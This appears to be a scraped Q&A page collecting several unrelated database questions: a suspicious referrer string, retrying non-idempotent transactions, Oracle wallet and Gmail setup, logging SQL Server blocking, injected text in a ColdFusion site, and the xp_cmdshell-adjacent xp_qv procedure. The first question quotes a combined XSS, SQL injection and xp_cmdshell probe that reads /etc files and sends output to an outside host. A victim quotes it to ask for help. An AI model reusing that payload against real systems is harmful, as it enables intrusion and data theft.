While monitoring visitors to my website, I noticed this code in referrer column:-
alert(\"XSS\")',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc%'>https://example.com/?display=1') AND 1=1 UNION A.......
I am new to this as it has never happened before. But it is obvious that it is to do with the database. The strange thing is that the IP address belongs to Microsoft: 20.94.192.0
Please how can I determine if I have been hacked, or the database been compromised, somehow? Would greatly appreciate your help.
Related
We are developing a SQL Database, and client connects to server with rpc.
Think about a case: there're Transaction_A(TxnA) & Transaction_B(TxnB). TxnA may be like UPDATE tbl SET a=a+1 WHERE id=1 .
When client gets CONN_TIMEOUT exception, the reason might be server crashed or network issues. Therefore, TxnA may or maynot complete write. And meanwhile TxnB may write to the same table and update table meta (like advancing the sequence number or revision).
So it seems no way to check TxnA completed or not by the client. And the query may not be idempotent, such as the 'UPDATE a=a+1' example above. So it cannot be retried recklessly.
My question: Is there any solution to solve this issue? I'm not sure how other SQL system or storage system work with this issue. Try google some keywords, but fail to get the answers.
Thank you for any inspiration.
Right now i'm working with oracle 11g on windows and currently trying to send notifications from my database using emails (Gmail), but all I'm clear with right now is that I have to include the Gmail certificate in the oracle wallets but don't know how to do it, and I also think that there's something to be done with the access control lists but I'm not completley sure how, any help or recommendations are enormously appreciated.
Backup the Oracle wallet files first. To get he wallet file locations run:
SELECT * FROM V$ENCRYPTION_WALLET
Then look at the orapki utility to get you started - search for this and you should find the Oracle documentation.
The following is how to add a certificate to the wallet:
orapki wallet add -wallet wallet_location -trusted_cert -cert certificate_location
For any Windows users who may need help with what I asked, there's a really good link/tutorial sort of instruction set on git:
https://github.com/YairPR/Oracle/wiki/Enviar-correo-con-Oracle:--ACL---UTL_SMTP---Wallet---SSL--TLS----Gmail
It's in spanish, but all the commands and steps are there, although you may just happen to need to translate it, hope it's useful for someone!
I have a problem with the company I work in, some people are using SQL in the wrong way causing blocks that naturally crash the whole system, but we are not able to catch who is doing this, because when perceiving the person for the process.
I wonder if there is any way to save the data from the blocks?
As soon as something happens it will save the data as SPID, Login, HostName, DBName, Command and of course if possible to pull and save the script that the guy is running. I usually see through:
dbcc inputbuffer (SPID)
I already gave a Google and I did not find it, so I came here.
Thanks in advance.
PS: Sorry for the English from Google Translate
We have a ColdFusion page where admins can insert/update some real estate records after logging in. We are noticing that in one table's Memo field called 'description', there are sometimes tags which hacking/junk info occasionally. I have introduced Captcha. The page is password protected and no linked from any pages--no accessible by search engines unless someone gave out the url accidentally. We are now also tracking the IP address of the person who is doing the inserts/updates. But still we just saw that all the data in the description field had the [junk text] -appended' to the end of the valid text , with an internal ip address of 192.168.0.101. This IP is someone's personal computer. One of our theory is that the person's computer is compromised. But what kind of virus would do that? Also, what I would like to do is to have a field called 'approved' which is 'no' by default but anytime an Insert/Update happens it goes to 'no' and 'triggers' an email to admins about the change. What could be the syntax of that inside SSMS? Thanks!
The most likely cause is SQL injection. It could be that your internal PC is compromised by malware or a viris that is attacking your site using one of many dozen attacks. The most common of them do exactly what you are describing...append content to the end of text or character fields in the DB. Here's a description of one common attack that does just that.
I would also check the following
Make sure handler scripts are "locked down" too - not just root urls. Sometimes a script you include is accessible via url and is used in hacking attempts.
Look for old code elswhere in your site that might not be password protected. if you have a legacy code base chances are there's some old code lying about that needs clean up :)
Look in the web logs for URL params with values that begin with EXEC( - this is a common approach to injection.
Scan the PC in question rigorously. Install charles or wireshark and watch HTTP traffic to see what's going on.
Finally, check all your cod for vulnerability to SQLi. Make sure all your variables use cfqueryparam and you have other controls in place. Passwords are not the only level of protection you need :)
Last night one of our SQL servers developed some major problems and after a colleague stopped, started, and all the usual things it started checking and rebuilding databases and is now running an extended stored procedure called "xp_qv".
The internet seems to be very short of information on what this procedure does or anythign like that so I was hoping somebody here might be able to help.
I should add that I assume it is meant to be running so the question isn't "Can I stop it" or anything like that, its just curiosity in what it is doing in the hope that it will help determine how long before things are usable again...
This is the only information I could find..
xp_qv, hosted in xpsqlbot.dll is a
wrapper around functionality in
sqlboot.dll, which returns information
about the SKU type, licensing etc It
is not documented that is why you can
not find a reference.